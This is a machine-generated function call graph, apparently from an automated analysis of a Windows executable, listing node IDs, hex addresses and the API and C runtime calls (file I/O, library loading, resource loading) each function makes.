101549->101539 101549->101550 101549->101565 103136 3a2408 60 API calls 101549->103136 103137 349e5d 60 API calls 101549->103137 103138 3489b3 69 API calls Mailbox 101549->103138 103139 34b73c 331 API calls 101549->103139 103140 3964da 60 API calls 101549->103140 103141 3a5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101549->103141 103142 3a3c55 66 API calls Mailbox 101549->103142 101550->101325 101551 3a9e4a 89 API calls 101551->101565 101553 3484c0 69 API calls 101553->101565 101554 3489b3 69 API calls 101554->101565 101555 349c90 59 API calls Mailbox 101555->101565 101556 34b73c 304 API calls 101556->101565 101558 39617e 59 API calls Mailbox 101558->101565 101559 3855d5 VariantClear 101559->101565 101560 396e8f 59 API calls 101560->101565 101561 38566b VariantClear 101561->101565 101562 348cd4 59 API calls Mailbox 101562->101565 101563 385419 VariantClear 101563->101565 101564 347de1 59 API calls 101564->101565 101565->101496 101565->101501 101565->101503 101565->101508 101565->101509 101565->101510 101565->101511 101565->101512 101565->101514 101565->101515 101565->101517 101565->101518 101565->101520 101565->101524 101565->101543 101565->101549 101565->101550 101565->101551 101565->101553 101565->101554 101565->101555 101565->101556 101565->101558 101565->101559 101565->101560 101565->101561 101565->101562 101565->101563 101565->101564 102974 34e6a0 101565->102974 103005 34f460 101565->103005 103024 34fce0 101565->103024 103104 34e420 331 API calls 101565->103104 103105 3431ce IsDialogMessageW GetClassLongW 101565->103105 103112 3c6018 59 API calls 101565->103112 103113 3a9a15 59 API calls Mailbox 101565->103113 103114 39d4f2 59 API calls 101565->103114 103115 349837 101565->103115 103133 3960ef 59 API calls 2 library calls 101565->103133 103134 348401 59 API calls 101565->103134 103135 3482df 59 API calls Mailbox 101565->103135 101566->101327 101567->101304 101568->101314 101570 371940 __ftell_nolock 101569->101570 101571 344713 GetModuleFileNameW 101570->101571 101572 347de1 59 API calls 101571->101572 101573 344739 101572->101573 101574 344750 60 API calls 101573->101574 101575 344743 Mailbox 101574->101575 101575->101323 101577 347df0 __wsetenvp _memmove 101576->101577 101578 360db6 Mailbox 59 API calls 101577->101578 101579 347e2e 101578->101579 101579->101326 101598 360dbe 101596->101598 101599 360dd8 101598->101599 101601 360ddc std::exception::exception 101598->101601 101606 36571c 101598->101606 101623 3633a1 DecodePointer 101598->101623 101599->101345 101624 36859b RaiseException 101601->101624 101603 360e06 101625 3684d1 58 API calls _free 101603->101625 101605 360e18 101605->101345 101607 365797 101606->101607 101615 365728 101606->101615 101632 3633a1 DecodePointer 101607->101632 101609 36579d 101633 368b28 58 API calls __getptd_noexit 101609->101633 101612 36575b RtlAllocateHeap 101612->101615 101622 36578f 101612->101622 101614 365733 101614->101615 101626 36a16b 58 API calls __NMSG_WRITE 101614->101626 101627 36a1c8 58 API calls 6 library calls 101614->101627 101628 36309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101614->101628 101615->101612 101615->101614 101616 365783 101615->101616 101620 365781 101615->101620 101629 3633a1 DecodePointer 101615->101629 101630 368b28 58 API calls __getptd_noexit 101616->101630 101631 368b28 58 API calls __getptd_noexit 101620->101631 101622->101598 101623->101598 101624->101603 101625->101605 101626->101614 101627->101614 101629->101615 101630->101620 101631->101622 101632->101609 101633->101622 101635 343d3e __ftell_nolock 101634->101635 101636 347bcc 59 API calls 101635->101636 101637 343ea4 Mailbox 101635->101637 101639 343d70 101636->101639 101637->101352 101646 343da6 Mailbox 101639->101646 101760 3479f2 101639->101760 101640 343e77 101640->101637 101641 347de1 59 API calls 101640->101641 101643 343e98 101641->101643 101642 347de1 59 API calls 101642->101646 101644 343f74 59 API calls 101643->101644 101644->101637 101646->101637 101646->101640 101646->101642 101647 3479f2 59 API calls 101646->101647 101763 343f74 101646->101763 101647->101646 101773 344bb5 101648->101773 101653 37d8e6 101655 344e4a 84 API calls 101653->101655 101654 344e08 LoadLibraryExW 101783 344b6a 101654->101783 101657 37d8ed 101655->101657 101659 344b6a 3 API calls 101657->101659 101661 37d8f5 101659->101661 101809 344f0b 101661->101809 101662 344e2f 101662->101661 101663 344e3b 101662->101663 101664 344e4a 84 API calls 101663->101664 101666 3437d4 101664->101666 101666->101359 101666->101360 101669 37d91c 101817 344ec7 101669->101817 101671 37d929 101673 348052 101672->101673 101674 3437ef 101672->101674 102247 347f77 59 API calls 2 library calls 101673->102247 101676 34928a 101674->101676 101677 360db6 Mailbox 59 API calls 101676->101677 101678 3437fb 101677->101678 101678->101372 101680 3484cb 101679->101680 101682 3484f2 101680->101682 102248 3489b3 69 API calls Mailbox 101680->102248 101682->101377 101684 343ef3 101683->101684 101685 343eda 101683->101685 101687 347bcc 59 API calls 101684->101687 101686 348047 59 API calls 101685->101686 101688 343879 101686->101688 101687->101688 101689 362efd 101688->101689 101690 362f7e 101689->101690 101691 362f09 101689->101691 102251 362f90 60 API calls 4 library calls 101690->102251 101698 362f2e 101691->101698 102249 368b28 58 API calls __getptd_noexit 101691->102249 101694 362f8b 101694->101398 101695 362f15 102250 368db6 9 API calls ___strgtold12_l 101695->102250 101697 362f20 101697->101398 101698->101398 101700 3492d6 101699->101700 101701 360db6 Mailbox 59 API calls 101700->101701 101702 3492e4 101701->101702 101704 343924 101702->101704 102252 3491fc 59 API calls Mailbox 101702->102252 101705 349050 101704->101705 102253 349160 101705->102253 101707 34905f 101708 360db6 Mailbox 59 API calls 101707->101708 101709 343932 101707->101709 101708->101709 101710 348ee0 101709->101710 101711 37f17c 101710->101711 101715 348ef7 101710->101715 101711->101715 102263 348bdb 59 API calls Mailbox 101711->102263 101713 349040 102262 349d3c 60 API calls Mailbox 101713->102262 101714 348ff8 101716 360db6 Mailbox 59 API calls 101714->101716 101715->101713 101715->101714 101718 348fff 101715->101718 101716->101718 101718->101426 101720 344ee5 85 API calls 101719->101720 101721 3a95ca 101720->101721 102264 3a9734 101721->102264 101724 344f0b 74 API calls 101725 3a95f7 101724->101725 101726 344f0b 74 API calls 101725->101726 101727 3a9607 101726->101727 101728 344f0b 74 API calls 101727->101728 101729 3a9622 101728->101729 101730 344f0b 74 API calls 101729->101730 101731 3a963d 101730->101731 101732 344ee5 85 API calls 101731->101732 101733 3a9654 101732->101733 101734 36571c __crtCompareStringA_stat 58 API calls 101733->101734 101735 3a965b 101734->101735 101736 36571c __crtCompareStringA_stat 58 API calls 101735->101736 101737 3a9665 101736->101737 101738 344f0b 74 API calls 101737->101738 101739 3a9679 101738->101739 101740 3a9109 GetSystemTimeAsFileTime 101739->101740 101741 3a968c 101740->101741 101742 3a96a1 101741->101742 101743 3a96b6 101741->101743 101744 362d55 _free 58 API calls 101742->101744 101745 3a971b 101743->101745 101746 3a96bc 101743->101746 101747 3a96a7 101744->101747 101749 362d55 _free 58 API calls 101745->101749 102270 3a8b06 101746->102270 101750 362d55 _free 58 API calls 101747->101750 101752 37d186 101749->101752 101750->101752 101752->101364 101754 344e4a 101752->101754 101753 362d55 _free 58 API calls 101753->101752 101755 344e54 101754->101755 101756 344e5b 101754->101756 101757 3653a6 __fcloseall 83 API calls 101755->101757 101758 344e6a 101756->101758 101759 344e7b FreeLibrary 101756->101759 101757->101756 101758->101364 101759->101758 101769 347e4f 101760->101769 101762 3479fd 101762->101639 101764 343f82 101763->101764 101768 343fa4 _memmove 101763->101768 101766 360db6 Mailbox 59 API calls 101764->101766 101765 360db6 Mailbox 59 API calls 101767 343fb8 101765->101767 101766->101768 101767->101646 101768->101765 101770 347e62 101769->101770 101772 347e5f _memmove 101769->101772 101771 360db6 Mailbox 59 API calls 101770->101771 101771->101772 101772->101762 101822 344c03 101773->101822 101776 344bdc 101778 344bf5 101776->101778 101779 344bec FreeLibrary 101776->101779 101777 344c03 2 API calls 101777->101776 101780 36525b 101778->101780 101779->101778 101826 365270 101780->101826 101782 344dfc 101782->101653 101782->101654 101984 344c36 101783->101984 101786 344b8f 101788 344ba1 FreeLibrary 101786->101788 101789 344baa 101786->101789 101787 344c36 2 API calls 101787->101786 101788->101789 101790 344c70 101789->101790 101791 360db6 Mailbox 59 API calls 101790->101791 101792 344c85 101791->101792 101988 34522e 101792->101988 101794 344c91 _memmove 101795 344ccc 101794->101795 101797 344dc1 101794->101797 101798 344d89 101794->101798 101796 344ec7 69 API calls 101795->101796 101805 344cd5 101796->101805 102002 3a991b 95 API calls 101797->102002 101991 344e89 CreateStreamOnHGlobal 101798->101991 101801 344f0b 74 API calls 101801->101805 101803 344d69 101803->101662 101804 37d8a7 101806 344ee5 85 API calls 101804->101806 101805->101801 101805->101803 101805->101804 101997 344ee5 101805->101997 101807 37d8bb 101806->101807 101808 344f0b 74 API calls 101807->101808 101808->101803 101810 344f1d 101809->101810 101813 37d9cd 101809->101813 102026 3655e2 101810->102026 101814 3a9109 102224 3a8f5f 101814->102224 101816 3a911f 101816->101669 101818 344ed6 101817->101818 101819 37d990 101817->101819 102229 365c60 101818->102229 101821 344ede 101821->101671 101823 344bd0 101822->101823 101824 344c0c LoadLibraryA 101822->101824 101823->101776 101823->101777 101824->101823 101825 344c1d GetProcAddress 101824->101825 101825->101823 101829 36527c __fcloseall 101826->101829 101827 36528f 101875 368b28 58 API calls __getptd_noexit 101827->101875 101829->101827 101831 3652c0 101829->101831 101830 365294 101876 368db6 9 API calls ___strgtold12_l 101830->101876 101845 3704e8 101831->101845 101834 3652c5 101835 3652ce 101834->101835 101836 3652db 101834->101836 101877 368b28 58 API calls __getptd_noexit 101835->101877 101838 365305 101836->101838 101839 3652e5 101836->101839 101860 370607 101838->101860 101878 368b28 58 API calls __getptd_noexit 101839->101878 101840 36529f __fcloseall @_EH4_CallFilterFunc@8 101840->101782 101846 3704f4 __fcloseall 101845->101846 101847 369c0b __lock 58 API calls 101846->101847 101858 370502 101847->101858 101848 370576 101880 3705fe 101848->101880 101849 37057d 101885 36881d 58 API calls 2 library calls 101849->101885 101852 370584 101852->101848 101886 369e2b InitializeCriticalSectionAndSpinCount 101852->101886 101853 3705f3 __fcloseall 101853->101834 101855 369c93 __mtinitlocknum 58 API calls 101855->101858 101857 3705aa EnterCriticalSection 101857->101848 101858->101848 101858->101849 101858->101855 101883 366c50 59 API calls __lock 101858->101883 101884 366cba LeaveCriticalSection LeaveCriticalSection _doexit 101858->101884 101868 370627 __wopenfile 101860->101868 101861 370641 101891 368b28 58 API calls __getptd_noexit 101861->101891 101863 370646 101892 368db6 9 API calls ___strgtold12_l 101863->101892 101865 365310 101879 365332 LeaveCriticalSection LeaveCriticalSection _fprintf 101865->101879 101866 37085f 101888 3785a1 101866->101888 101868->101861 101874 3707fc 101868->101874 101893 3637cb 60 API calls 3 library calls 101868->101893 101870 3707f5 101870->101874 101894 3637cb 60 API calls 3 library calls 101870->101894 101872 370814 101872->101874 101895 3637cb 60 API calls 3 library calls 101872->101895 101874->101861 101874->101866 101875->101830 101876->101840 101877->101840 101878->101840 101879->101840 101887 369d75 LeaveCriticalSection 101880->101887 101882 370605 101882->101853 101883->101858 101884->101858 101885->101852 101886->101857 101887->101882 101896 377d85 101888->101896 101890 3785ba 101890->101865 101891->101863 101892->101865 101893->101870 101894->101872 101895->101874 101897 377d91 __fcloseall 101896->101897 101898 377da7 101897->101898 101901 377ddd 101897->101901 101981 368b28 58 API calls __getptd_noexit 101898->101981 101900 377dac 101982 368db6 9 API calls ___strgtold12_l 101900->101982 101907 377e4e 101901->101907 101904 377df9 101983 377e22 LeaveCriticalSection __unlock_fhandle 101904->101983 101906 377db6 __fcloseall 101906->101890 101908 377e6e 101907->101908 101909 3644ea __wsopen_nolock 58 API calls 101908->101909 101912 377e8a 101909->101912 101910 368dc6 __invoke_watson 8 API calls 101911 3785a0 101910->101911 101913 377d85 __wsopen_helper 103 API calls 101911->101913 101914 377ec4 101912->101914 101921 377ee7 101912->101921 101956 377fc1 101912->101956 101915 3785ba 101913->101915 101916 368af4 __close 58 API calls 101914->101916 101915->101904 101917 377ec9 101916->101917 101918 368b28 __lseek_nolock 58 API calls 101917->101918 101919 377ed6 101918->101919 101922 368db6 ___strgtold12_l 9 API calls 101919->101922 101920 377fa5 101923 368af4 __close 58 API calls 101920->101923 101921->101920 101928 377f83 101921->101928 101924 377ee0 101922->101924 101925 377faa 101923->101925 101924->101904 101926 368b28 __lseek_nolock 58 API calls 101925->101926 101927 377fb7 101926->101927 101929 368db6 ___strgtold12_l 9 API calls 101927->101929 101930 36d294 __alloc_osfhnd 61 API calls 101928->101930 101929->101956 101931 378051 101930->101931 101932 37807e 101931->101932 101933 37805b 101931->101933 101934 377cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101932->101934 101935 368af4 __close 58 API calls 101933->101935 101945 3780a0 101934->101945 101936 378060 101935->101936 101937 368b28 __lseek_nolock 58 API calls 101936->101937 101939 37806a 101937->101939 101938 37811e GetFileType 101940 37816b 101938->101940 101941 378129 GetLastError 101938->101941 101943 368b28 __lseek_nolock 58 API calls 101939->101943 101952 36d52a __set_osfhnd 59 API calls 101940->101952 101944 368b07 __dosmaperr 58 API calls 101941->101944 101942 3780ec GetLastError 101946 368b07 __dosmaperr 58 API calls 101942->101946 101943->101924 101947 378150 CloseHandle 101944->101947 101945->101938 101945->101942 101948 377cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101945->101948 101949 378111 101946->101949 101947->101949 101950 37815e 101947->101950 101951 3780e1 101948->101951 101953 368b28 __lseek_nolock 58 API calls 101949->101953 101954 368b28 __lseek_nolock 58 API calls 101950->101954 101951->101938 101951->101942 101955 378189 101952->101955 101953->101956 101957 378163 101954->101957 101958 378344 101955->101958 101959 3718c1 __lseeki64_nolock 60 API calls 101955->101959 101978 37820a 101955->101978 101956->101910 101957->101949 101958->101956 101960 378517 CloseHandle 101958->101960 101961 3781f3 101959->101961 101962 377cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101960->101962 101964 368af4 __close 58 API calls 101961->101964 101961->101978 101963 37853e 101962->101963 101966 378546 GetLastError 101963->101966 101967 378572 101963->101967 101964->101978 101965 370e5b 70 API calls __read_nolock 101965->101978 101968 368b07 __dosmaperr 58 API calls 101966->101968 101967->101956 101970 378552 101968->101970 101969 37823c 101972 3797a2 __chsize_nolock 82 API calls 101969->101972 101969->101978 101973 36d43d __free_osfhnd 59 API calls 101970->101973 101971 370add __close_nolock 61 API calls 101971->101978 101972->101969 101973->101967 101974 3718c1 60 API calls __lseeki64_nolock 101974->101978 101975 36d886 __write 78 API calls 101975->101978 101976 3783c1 101977 370add __close_nolock 61 API calls 101976->101977 101979 3783c8 101977->101979 101978->101958 101978->101965 101978->101969 101978->101971 101978->101974 101978->101975 101978->101976 101980 368b28 __lseek_nolock 58 API calls 101979->101980 101980->101956 101981->101900 101982->101906 101983->101906 101985 344b83 101984->101985 101986 344c3f LoadLibraryA 101984->101986 101985->101786 101985->101787 101986->101985 101987 344c50 GetProcAddress 101986->101987 101987->101985 101989 360db6 Mailbox 59 API calls 101988->101989 101990 345240 101989->101990 101990->101794 101992 344ea3 FindResourceExW 101991->101992 101996 344ec0 101991->101996 101993 37d933 LoadResource 101992->101993 101992->101996 101994 37d948 SizeofResource 101993->101994 101993->101996 101995 37d95c LockResource 101994->101995 101994->101996 101995->101996 101996->101795 101998 344ef4 101997->101998 101999 37d9ab 101997->101999 102003 36584d 101998->102003 102001 344f02 102001->101805 102002->101795 102004 365859 __fcloseall 102003->102004 102005 36586b 102004->102005 102007 365891 102004->102007 102016 368b28 58 API calls __getptd_noexit 102005->102016 102018 366c11 102007->102018 102008 365870 102017 368db6 9 API calls ___strgtold12_l 102008->102017 102011 365897 102024 3657be 83 API calls 5 library calls 102011->102024 102013 3658a6 102025 3658c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102013->102025 102015 36587b __fcloseall 102015->102001 102016->102008 102017->102015 102019 366c43 EnterCriticalSection 102018->102019 102020 366c21 102018->102020 102022 366c39 102019->102022 102020->102019 102021 366c29 102020->102021 102023 369c0b __lock 58 API calls 102021->102023 102022->102011 102023->102022 102024->102013 102025->102015 102029 3655fd 102026->102029 102028 344f2e 102028->101814 102030 365609 __fcloseall 102029->102030 102031 36564c 102030->102031 102032 365644 __fcloseall 102030->102032 102036 36561f _memset 102030->102036 102033 366c11 __lock_file 59 API calls 102031->102033 102032->102028 102035 365652 102033->102035 102042 36541d 102035->102042 102056 368b28 58 API calls __getptd_noexit 102036->102056 102037 365639 102057 368db6 9 API calls ___strgtold12_l 102037->102057 102046 365438 _memset 102042->102046 102049 365453 102042->102049 102043 365443 102154 368b28 58 API calls __getptd_noexit 102043->102154 102045 365448 102155 368db6 9 API calls ___strgtold12_l 102045->102155 102046->102043 102046->102049 102053 365493 102046->102053 102058 365686 LeaveCriticalSection LeaveCriticalSection _fprintf 102049->102058 102050 3655a4 _memset 102157 368b28 58 API calls __getptd_noexit 102050->102157 102053->102049 102053->102050 102059 3646e6 102053->102059 102066 370e5b 102053->102066 102134 370ba7 102053->102134 102156 370cc8 58 API calls 4 library calls 102053->102156 102056->102037 102057->102032 102058->102032 102060 364705 102059->102060 102061 3646f0 102059->102061 102060->102053 102158 368b28 58 API calls __getptd_noexit 102061->102158 102063 3646f5 102159 368db6 9 API calls ___strgtold12_l 102063->102159 102065 364700 102065->102053 102067 370e93 102066->102067 102068 370e7c 102066->102068 102069 3715cb 102067->102069 102073 370ecd 102067->102073 102169 368af4 58 API calls __getptd_noexit 102068->102169 102185 368af4 58 API calls __getptd_noexit 102069->102185 102072 370e81 102170 368b28 58 API calls __getptd_noexit 102072->102170 102076 370ed5 102073->102076 102083 370eec 102073->102083 102074 3715d0 102186 368b28 58 API calls __getptd_noexit 102074->102186 102171 368af4 58 API calls __getptd_noexit 102076->102171 102079 370eda 102172 368b28 58 API calls __getptd_noexit 102079->102172 102080 370ee1 102187 368db6 9 API calls ___strgtold12_l 102080->102187 102082 370f01 102173 368af4 58 API calls __getptd_noexit 102082->102173 102083->102082 102084 370f1b 102083->102084 102087 370f39 102083->102087 102115 370e88 102083->102115 102084->102082 102089 370f26 102084->102089 102174 36881d 58 API calls 2 library calls 102087->102174 102160 375c6b 102089->102160 102090 370f49 102092 370f51 102090->102092 102093 370f6c 102090->102093 102175 368b28 58 API calls __getptd_noexit 102092->102175 102177 3718c1 60 API calls 2 library calls 102093->102177 102094 37103a 102095 3710b3 ReadFile 102094->102095 102098 371050 GetConsoleMode 102094->102098 102099 3710d5 102095->102099 102100 371593 GetLastError 102095->102100 102102 371064 102098->102102 102103 3710b0 102098->102103 102099->102100 102108 3710a5 102099->102108 102104 371093 102100->102104 102105 3715a0 102100->102105 102101 370f56 102176 368af4 58 API calls __getptd_noexit 102101->102176 102102->102103 102107 37106a ReadConsoleW 102102->102107 102103->102095 102116 371099 102104->102116 102178 368b07 58 API calls 3 library calls 102104->102178 102183 368b28 58 API calls __getptd_noexit 102105->102183 102107->102108 102111 37108d GetLastError 102107->102111 102108->102116 102117 37110a 102108->102117 102120 371377 102108->102120 102110 3715a5 102184 368af4 58 API calls __getptd_noexit 102110->102184 102111->102104 102114 362d55 _free 58 API calls 102114->102115 102115->102053 102116->102114 102116->102115 102119 371176 ReadFile 102117->102119 102127 3711f7 102117->102127 102122 371197 GetLastError 102119->102122 102132 3711a1 102119->102132 102120->102116 102121 37147d ReadFile 102120->102121 102126 3714a0 GetLastError 102121->102126 102133 3714ae 102121->102133 102122->102132 102123 3712b4 102128 371264 MultiByteToWideChar 102123->102128 102181 3718c1 60 API calls 2 library calls 102123->102181 102124 3712a4 102180 368b28 58 API calls __getptd_noexit 102124->102180 102126->102133 102127->102116 102127->102123 102127->102124 102127->102128 102128->102111 102128->102116 102132->102117 102179 3718c1 60 API calls 2 library calls 102132->102179 102133->102120 102182 3718c1 60 API calls 2 library calls 102133->102182 102135 370bb2 102134->102135 102139 370bc7 102134->102139 102221 368b28 58 API calls __getptd_noexit 102135->102221 102137 370bb7 102222 368db6 9 API calls ___strgtold12_l 102137->102222 102140 370bfc 102139->102140 102145 370bc2 102139->102145 102223 375fe4 58 API calls __malloc_crt 102139->102223 102142 3646e6 __fputwc_nolock 58 API calls 102140->102142 102143 370c10 102142->102143 102188 370d47 102143->102188 102145->102053 102146 370c17 102146->102145 102147 3646e6 __fputwc_nolock 58 API calls 102146->102147 102148 370c3a 102147->102148 102148->102145 102149 3646e6 __fputwc_nolock 58 API calls 102148->102149 102150 370c46 102149->102150 102150->102145 102151 3646e6 __fputwc_nolock 58 API calls 102150->102151 102152 370c53 102151->102152 102153 3646e6 __fputwc_nolock 58 API calls 102152->102153 102153->102145 102154->102045 102155->102049 102156->102053 102157->102045 102158->102063 102159->102065 102161 375c76 102160->102161 102163 375c83 102160->102163 102162 368b28 __lseek_nolock 58 API calls 102161->102162 102164 375c7b 102162->102164 102165 375c8f 102163->102165 102166 368b28 __lseek_nolock 58 API calls 102163->102166 102164->102094 102165->102094 102167 375cb0 102166->102167 102168 368db6 ___strgtold12_l 9 API calls 102167->102168 102168->102164 102169->102072 102170->102115 102171->102079 102172->102080 102173->102079 102174->102090 102175->102101 102176->102115 102177->102089 102178->102116 102179->102132 102180->102116 102181->102128 102182->102133 102183->102110 102184->102116 102185->102074 102186->102080 102187->102115 102189 370d53 __fcloseall 102188->102189 102190 370d77 102189->102190 102191 370d60 102189->102191 102192 370e3b 102190->102192 102195 370d8b 102190->102195 102193 368af4 __close 58 API calls 102191->102193 102196 368af4 __close 58 API calls 102192->102196 102194 370d65 102193->102194 102197 368b28 __lseek_nolock 58 API calls 102194->102197 102198 370db6 102195->102198 102199 370da9 102195->102199 102200 370dae 102196->102200 102212 370d6c __fcloseall 102197->102212 102202 370dc3 102198->102202 102203 370dd8 102198->102203 102201 368af4 __close 58 API calls 102199->102201 102205 368b28 __lseek_nolock 58 API calls 102200->102205 102201->102200 102206 368af4 __close 58 API calls 102202->102206 102204 36d206 ___lock_fhandle 59 API calls 102203->102204 102207 370dde 102204->102207 102208 370dd0 102205->102208 102209 370dc8 102206->102209 102210 370e04 102207->102210 102211 370df1 102207->102211 102215 368db6 ___strgtold12_l 9 API calls 102208->102215 102213 368b28 __lseek_nolock 58 API calls 102209->102213 102216 368b28 __lseek_nolock 58 API calls 102210->102216 102214 370e5b __read_nolock 70 API calls 102211->102214 102212->102146 102213->102208 102217 370dfd 102214->102217 102215->102212 102218 370e09 102216->102218 102220 370e33 __read LeaveCriticalSection 102217->102220 102219 368af4 __close 58 API calls 102218->102219 102219->102217 102220->102212 102221->102137 102222->102145 102223->102140 102227 36520a GetSystemTimeAsFileTime 102224->102227 102226 3a8f6e 102226->101816 102228 365238 __aulldiv 102227->102228 102228->102226 102230 365c6c __fcloseall 102229->102230 102231 365c93 102230->102231 102232 365c7e 102230->102232 102234 366c11 __lock_file 59 API calls 102231->102234 102243 368b28 58 API calls __getptd_noexit 102232->102243 102236 365c99 102234->102236 102235 365c83 102244 368db6 9 API calls ___strgtold12_l 102235->102244 102245 3658d0 67 API calls 6 library calls 102236->102245 102239 365ca4 102246 365cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102239->102246 102241 365c8e __fcloseall 102241->101821 102242 365cb6 102242->102241 102243->102235 102244->102241 102245->102239 102246->102242 102247->101674 102248->101682 102249->101695 102250->101697 102251->101694 102252->101704 102254 349169 Mailbox 102253->102254 102255 37f19f 102254->102255 102260 349173 102254->102260 102256 360db6 Mailbox 59 API calls 102255->102256 102257 37f1ab 102256->102257 102258 34917a 102258->101707 102260->102258 102261 349c90 59 API calls Mailbox 102260->102261 102261->102260 102262->101718 102263->101715 102269 3a9748 __tzset_nolock _wcscmp 102264->102269 102265 344f0b 74 API calls 102265->102269 102266 3a95dc 102266->101724 102266->101752 102267 3a9109 GetSystemTimeAsFileTime 102267->102269 102268 344ee5 85 API calls 102268->102269 102269->102265 102269->102266 102269->102267 102269->102268 102271 3a8b1f 102270->102271 102272 3a8b11 102270->102272 102274 3a8b64 102271->102274 102275 36525b 115 API calls 102271->102275 102300 3a8b28 102271->102300 102273 36525b 115 API calls 102272->102273 102273->102271 102301 3a8d91 102274->102301 102277 3a8b49 102275->102277 102277->102274 102279 3a8b52 102277->102279 102278 3a8ba8 102280 3a8bac 102278->102280 102281 3a8bcd 102278->102281 102283 3653a6 __fcloseall 83 API calls 102279->102283 102279->102300 102285 3653a6 __fcloseall 83 API calls 102280->102285 102286 3a8bb9 102280->102286 102305 3a89a9 102281->102305 102283->102300 102285->102286 102289 3653a6 __fcloseall 83 API calls 102286->102289 102286->102300 102287 3a8bfb 102314 3a8c2b 102287->102314 102288 3a8bdb 102290 3a8be8 102288->102290 102292 3653a6 __fcloseall 83 API calls 102288->102292 102289->102300 102294 3653a6 __fcloseall 83 API calls 102290->102294 102290->102300 102292->102290 102294->102300 102297 3a8c16 102299 3653a6 __fcloseall 83 API calls 102297->102299 102297->102300 102299->102300 102300->101753 102302 3a8db6 102301->102302 102304 3a8d9f __tzset_nolock _memmove 102301->102304 102303 3655e2 __fread_nolock 74 API calls 102302->102303 102303->102304 102304->102278 102306 36571c __crtCompareStringA_stat 58 API calls 102305->102306 102307 3a89b8 102306->102307 102308 36571c __crtCompareStringA_stat 58 API calls 102307->102308 102309 3a89cc 102308->102309 102310 36571c __crtCompareStringA_stat 58 API calls 102309->102310 102311 3a89e0 102310->102311 102312 3a8d0d 58 API calls 102311->102312 102313 3a89f3 102311->102313 102312->102313 102313->102287 102313->102288 102321 3a8c40 102314->102321 102315 3a8cf8 102358 3a8f35 102315->102358 102317 3a8c02 102322 3a8d0d 102317->102322 102318 3a8a05 74 API calls 102318->102321 102321->102315 102321->102317 102321->102318 102343 3a8aa1 102321->102343 102354 3a8e12 102321->102354 102323 3a8d1a 102322->102323 102324 3a8d20 102322->102324 102326 362d55 _free 58 API calls 102323->102326 102325 3a8d31 102324->102325 102327 362d55 _free 58 API calls 102324->102327 102328 3a8c09 102325->102328 102329 362d55 _free 58 API calls 102325->102329 102326->102324 102327->102325 102328->102297 102330 3653a6 102328->102330 102329->102328 102331 3653b2 __fcloseall 102330->102331 102332 3653c6 102331->102332 102333 3653de 102331->102333 102414 368b28 58 API calls __getptd_noexit 102332->102414 102335 366c11 __lock_file 59 API calls 102333->102335 102339 3653d6 __fcloseall 102333->102339 102337 3653f0 102335->102337 102336 3653cb 102415 368db6 9 API calls ___strgtold12_l 102336->102415 102398 36533a 102337->102398 102339->102297 102362 3a8a05 102343->102362 102346 3a8afd 102346->102321 102347 3a8a05 74 API calls 102348 3a8abd 102347->102348 102348->102346 102349 3a8a05 74 API calls 102348->102349 102350 3a8ace 102349->102350 102350->102346 102351 3a8a05 74 API calls 102350->102351 102352 3a8ae0 102351->102352 102352->102346 102353 3a8a05 74 API calls 102352->102353 102353->102352 102355 3a8e61 102354->102355 102356 3a8e21 102354->102356 102355->102356 102366 3a8ee8 102355->102366 102356->102321 102359 3a8f53 102358->102359 102360 3a8f42 102358->102360 102359->102317 102361 364863 80 API calls 102360->102361 102361->102359 102365 3a8a18 102362->102365 102363 3a8a98 102363->102346 102363->102347 102364 3a8e9f 74 API calls 102364->102365 102365->102363 102365->102364 102367 3a8f25 102366->102367 102368 3a8f14 102366->102368 102367->102355 102370 364863 102368->102370 102371 36486f __fcloseall 102370->102371 102372 3648a5 102371->102372 102373 36488d 102371->102373 102375 36489d __fcloseall 102371->102375 102376 366c11 __lock_file 59 API calls 102372->102376 102395 368b28 58 API calls __getptd_noexit 102373->102395 102375->102367 102378 3648ab 102376->102378 102377 364892 102396 368db6 9 API calls ___strgtold12_l 102377->102396 102383 36470a 102378->102383 102386 364719 102383->102386 102389 364737 102383->102389 102384 364727 102385 368b28 __lseek_nolock 58 API calls 102384->102385 102387 36472c 102385->102387 102386->102384 102386->102389 102394 364751 _memmove 102386->102394 102388 368db6 ___strgtold12_l 9 API calls 102387->102388 102388->102389 102397 3648dd LeaveCriticalSection LeaveCriticalSection _fprintf 102389->102397 102390 36ae1e __flsbuf 78 API calls 102390->102394 102391 364a3d __flush 78 API calls 102391->102394 102392 3646e6 __fputwc_nolock 58 API calls 102392->102394 102393 36d886 __write 78 API calls 102393->102394 102394->102389 102394->102390 102394->102391 102394->102392 102394->102393 102395->102377 102396->102375 102397->102375 102399 36535d 102398->102399 102400 365349 102398->102400 102402 365359 102399->102402 102417 364a3d 102399->102417 102453 368b28 58 API calls __getptd_noexit 102400->102453 102416 365415 LeaveCriticalSection LeaveCriticalSection _fprintf 102402->102416 102403 36534e 102454 368db6 9 API calls ___strgtold12_l 102403->102454 102409 3646e6 __fputwc_nolock 58 API calls 102410 365377 102409->102410 102427 370a02 102410->102427 102412 36537d 102412->102402 102413 362d55 _free 58 API calls 102412->102413 102413->102402 102414->102336 102415->102339 102416->102339 102418 364a50 102417->102418 102419 364a74 102417->102419 102418->102419 102420 3646e6 __fputwc_nolock 58 API calls 102418->102420 102423 370b77 102419->102423 102421 364a6d 102420->102421 102455 36d886 102421->102455 102424 365371 102423->102424 102425 370b84 102423->102425 102424->102409 102425->102424 102426 362d55 _free 58 API calls 102425->102426 102426->102424 102428 370a0e __fcloseall 102427->102428 102429 370a32 102428->102429 102430 370a1b 102428->102430 102431 370abd 102429->102431 102433 370a42 102429->102433 102580 368af4 58 API calls __getptd_noexit 102430->102580 102585 368af4 58 API calls __getptd_noexit 102431->102585 102436 370a60 102433->102436 102437 370a6a 102433->102437 102435 370a20 102581 368b28 58 API calls __getptd_noexit 102435->102581 102582 368af4 58 API calls __getptd_noexit 102436->102582 102441 36d206 ___lock_fhandle 59 API calls 102437->102441 102438 370a65 102586 368b28 58 API calls __getptd_noexit 102438->102586 102443 370a70 102441->102443 102445 370a83 102443->102445 102446 370a8e 102443->102446 102444 370ac9 102587 368db6 9 API calls ___strgtold12_l 102444->102587 102565 370add 102445->102565 102583 368b28 58 API calls __getptd_noexit 102446->102583 